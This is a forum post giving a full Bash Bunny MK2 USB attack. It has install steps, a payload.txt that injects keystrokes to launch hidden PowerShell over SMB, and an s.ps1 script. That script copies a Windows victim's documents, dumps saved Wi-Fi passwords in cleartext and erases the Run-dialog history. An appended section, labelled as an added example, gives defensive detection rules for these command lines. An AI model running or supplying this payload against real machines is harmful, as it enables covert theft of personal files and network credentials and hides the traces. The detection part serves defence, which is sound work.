jblk01 Posted July 25, 2021 (edited)

Now you can involuntarily back up more of the target's data by writing to the microSD card instead of the internal storage.

Prerequisite: SSH or serial into your Bunny MK2 and do the following: `timedatectl set-time` followed by the current year, month and date.

Run:

```bash
apt update ; apt install gcc
cd /tools
wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
rm -f impacket-0.9.19.tar.gz
cd impacket
pip install -r requirements.txt
cd ../
mkdir tmp
cd tmp
pip2 install setuptools-rust
pip2 install cryptography
wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg
rm -f pyasn1-0.4.8-py2.7.egg
wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz
tar -xzvf pycryptodomex-3.10.1.tar.gz
cd pycryptodomex-3.10.1 && python setup.py install
cd /tools/
rm -rf tmp/
cd impacket/ && python setup.py install
```

Now on your microSD card, create the following directory structure:

```
/smb
|___loot/
|___s.ps1
```

Copy the following payload.txt into either switch 1 or switch 2:

```bash
######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION

# Mount SD as udisk
udisk mount

######## ETHERNET STAGE ########
LED STAGE1

# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log &

######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
Q GUI r
Q DELAY 500
Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q ENTER
LED SPECIAL

# Wait until files are done copying
while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE
# Sync file system
sync
# Unmount the SD card
udisk unmount

######## FINISH ########
# Trap is clean
sync
LED FINISH
shutdown 0
```

Finally, here is the s.ps1:

```powershell
$exfil_dir="$Env:UserProfile\Downloads"
$exfil_dir1="$Env:UserProfile\Documents"
$exfil_dir2="$Env:UserProfile\Desktop"
$exfil_ext="*.doc*"
$exfil_ext1="*.pdf*"
$exfil_ext2="*.xls*"
$exfil_ext3="*.ppt*"
$loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
mkdir $loot_dir
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt"
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
```

Now, eject the microSD card, insert it into your Bunny MK2, move the switch to the position where payload.txt is placed, and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂

Edited October 7, 2021 by jblk01: Modified PowerShell script to allow for multiple directory targeting and so that robocopy will not fail if the directory is empty.
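From the defender's side, the chain this payload types on the target leaves a recognisable trail in process-creation telemetry. The following is an added example, not part of the original post or of any Hak5 tool: a small rule set run over constructed process command lines (shaped like a Sysmon Event ID 1 `CommandLine` field) that scores the hidden PowerShell with inline `net use` credentials, the script loaded from a UNC path, the `netsh wlan ... key=clear` dump, and then correlates the robocopy legs by the UNC host they write to. The event records, rule names, weights and the threshold are all assumptions made for the example.

```python
# Added example, not from the original post: rules over Sysmon-style process command lines.
import re
# rule name -> (weight, regex over the lowercased command line)
RULES = {
    "ps_exec_bypass_hidden": (2, re.compile(
        r"powershell.*-exec(utionpolicy)?\s+bypass.*-windowstyle\s+hidden")),
    "net_use_inline_creds": (2, re.compile(
        r"net use\s+\\\\[\w.-]+\\\w+\s+/u(ser)?:\S+\s+\S+")),
    "script_from_unc_path": (2, re.compile(r"powershell.*\s\\\\[\w.-]+\\\S+\.ps1")),
    "wlan_key_clear": (2, re.compile(r"netsh\s+wlan\s+show\s+profile.*key=clear")),
    # Copying to a UNC path is common on its own, so it only adds weight.
    "robocopy_to_unc": (1, re.compile(r"robocopy\s+\S+\s+\\\\[\w.-]+\\\S+")),
}
ALERT_THRESHOLD = 2
UNC_HOST = re.compile(r"\\\\([\w.-]+)\\")  # host part of \\host\share

def match_rules(cmdline):
    """Names of all rules hit by one command line."""
    text = cmdline.lower()
    return [name for name, (_, rx) in RULES.items() if rx.search(text)]

def score(cmdline):
    """Sum of the weights of the rules a command line hits."""
    return sum(RULES[name][0] for name in match_rules(cmdline))

def scan(events):
    """Alert on events at or above the threshold, then pull in lower-weight
    events that touch the same UNC host (the robocopy legs of one payload)."""
    alerted = {e["id"]: match_rules(e["cmdline"]) for e in events
               if score(e["cmdline"]) >= ALERT_THRESHOLD}
    hosts = {h for e in events if e["id"] in alerted
             for h in UNC_HOST.findall(e["cmdline"].lower())}
    for e in events:
        hits = match_rules(e["cmdline"])
        if e["id"] not in alerted and hits and \
                set(UNC_HOST.findall(e["cmdline"].lower())) & hosts:
            alerted[e["id"]] = hits + ["same_host_as_alert"]
    return alerted

# Constructed records: 1-3 mirror the payload, 4-5 are ordinary admin activity.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": 'cmd /C "start /b powershell -exec bypass net use \\\\172.16.64.1\\s '
              '/u:user Password01; powershell -windowstyle hidden -exec bypass \\\\172.16.64.1\\s\\s.ps1; exit'},
    {"id": 2, "cmdline": 'robocopy C:\\Users\\alice\\Documents '
              '\\\\172.16.64.1\\s\\loot\\PC01\\2021-07-25_0930AM *.doc* /E /MT /Z'},
    {"id": 3, "cmdline": 'netsh wlan show profile name="CorpWiFi" key=clear'},
    {"id": 4, "cmdline": 'robocopy D:\\build \\\\fileserver\\backup /MIR'},
    {"id": 5, "cmdline": 'powershell -File C:\\scripts\\inventory.ps1'},
]
```

Running `scan(SAMPLE_EVENTS)` flags events 1 to 3 and leaves the unrelated robocopy and scheduled script alone; the same-host correlation is what separates the exfiltration copy from everyday UNC copies.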